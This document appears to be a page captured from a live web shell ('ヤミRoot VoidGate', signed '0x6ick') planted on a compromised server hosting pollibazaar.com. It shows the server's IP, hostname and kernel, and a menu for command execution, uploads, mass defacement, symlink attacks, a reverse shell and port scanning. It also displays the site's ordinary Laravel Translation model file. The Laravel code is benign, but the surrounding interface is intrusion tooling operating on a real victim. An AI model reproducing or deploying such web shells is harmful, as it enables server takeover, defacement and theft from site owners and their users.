ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
app
/
Models
/
Viewing: Translation.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\MorphTo; /** * @property int $translationable_id * @property string $translationable_type * @property string $locale * @property string $key * @property string $value */ class Translation extends Model { public $timestamps = false; protected $table = 'translations'; protected $fillable = [ 'translationable_type', 'translationable_id', 'locale', 'key', 'value', ]; protected $casts = [ 'translationable_id' => 'integer', 'translationable_type' => 'string', 'locale' => 'string', 'key' => 'string', 'value' => 'string', 'id' => 'integer', ]; public function translationable(): MorphTo { return $this->morphTo(); } protected static function boot(): void { parent::boot(); // static::addGlobalScope(new RememberScope); } }
Coded With 💗 by
0x6ick